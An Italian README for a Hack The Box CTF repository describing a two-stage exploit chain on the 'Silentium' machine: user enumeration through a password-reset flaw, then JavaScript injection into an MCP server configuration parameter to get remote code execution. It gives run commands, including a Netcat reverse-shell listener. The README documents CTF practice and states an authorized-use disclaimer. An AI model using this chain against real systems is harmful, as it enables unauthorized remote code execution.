
Sfruttamento Silentium HTB-CTF
Questa repository contiene la catena di sfruttamento completa per la macchina Silentium su Hack The Box. L'exploit sfrutta una vulnerabilità a due stadi che coinvolge l'enumerazione degli utenti e l'iniezione JavaScript per ottenere Remote Code Execution (RCE).
La catena di vulnerabilità consiste in un difetto di divulgazione di informazioni e una critica iniezione di codice. Prima enumerando gli utenti validi tramite un bug di reimpostazione della password, otteniamo il contesto necessario per colpire l'endpoint customMCP. La RCE viene ottenuta iniettando una funzione JavaScript dannosa nel parametro mcpServerConfig, che viene eseguita dal backend Node.js.
Devi avere Python 3 e Bash installati, insieme alla seguente libreria:
pip install requests
Esegui lo script di enumerazione (Bash) per trovare account validi (richiede users.txt):
python3 CVE-2025-58434.py
Sulla tua macchina locale, avvia un listener Netcat:
nc -lvnp 4444
Esegui lo script Python fornendo il target, il tuo IP e la chiave API ottenuta:
python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444
| Argomento | Descrizione | Richiesto |
|---|---|---|
| -t, --target | Host target | Sì |
| -k, --key | Token Bearer API | Sì |
| -l, --lhost | IP del tuo listener (VPN) | Sì |
| -p, --lport | Porta del tuo listener | Sì |
Questo script è inteso per scopi educativi e test di penetrazione autorizzati all'interno di ambienti CTF esclusivamente. Accedere o attaccare target senza autorizzazione preventiva è illegale.
Challenge: Silentium (Hack The Box)
CVE: CVE-2025-58434 | CVE-2025-59528